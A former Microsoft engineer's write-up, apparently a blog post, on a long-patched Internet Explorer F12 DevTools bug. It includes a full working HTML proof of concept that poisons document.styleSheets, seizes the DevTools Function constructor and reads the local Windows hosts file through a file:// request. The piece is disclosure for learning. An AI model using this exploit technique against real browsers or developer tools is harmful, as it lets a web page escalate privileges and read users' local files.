After playing around for a while with the F12 DOM Explorer, I found another spot where the tools consumed page-controlled data without proper isolation. This time the vulnerable line was in dom/cssinformationextractor.js: var selectorParts = selectorText.split(...). By overriding the styleSheets getter, a page could inject a fake rule object whose selectorText.split method captured the elevated Function constructor.
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
  <title>Test</title>
</head>
<body>
  Open DevTools and click on the DOM Explorer section. Exploit.<br /><br />
  File: dom/cssinformationextractor.js<br />
  Vulnerable Code: var selectorParts = selectorText.split(/([~+>,]|\s)+/);<br />
  <script>
    // Replace document.styleSheets with a getter that returns one synthetic stylesheet.
    // Its single rule's selectorText is not a string but an object whose split() method
    // receives the regex the DOM Explorer passes in and, from that regex, reaches the
    // DevTools realm's Function constructor.
    Object.defineProperty(document, 'styleSheets', {
      get: function () {
        var o = {
          "selectorText": {
            "split": function (arg) { exploit(arg.constructor.constructor); }
          }
        };
        return [{ "rules": [o] }];
      }
    });

    // F12Function is the DevTools realm's Function; code built with it runs with
    // DevTools privileges, here issuing a file:// XMLHttpRequest from the page.
    function exploit(F12Function) {
      var oXML = F12Function("return new XMLHttpRequest()")();
      oXML.open("GET", "file:///c:/windows/system32/drivers/etc/hosts", false);
      oXML.send(null);
      alert(oXML.responseText);
    }
  </script>
</body>
</html>
The document.styleSheets getter was overridden to return a synthetic stylesheet whose rule had a poisoned selectorText.split function. When the F12 DOM Explorer iterated the page’s stylesheets to display CSS information, it called split on that object, passing in a regex — and the function received the regex’s constructor.constructor, which was the privileged Function from the DevTools context. Opening the DOM Explorer panel on a malicious page was enough to trigger the exploit.
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.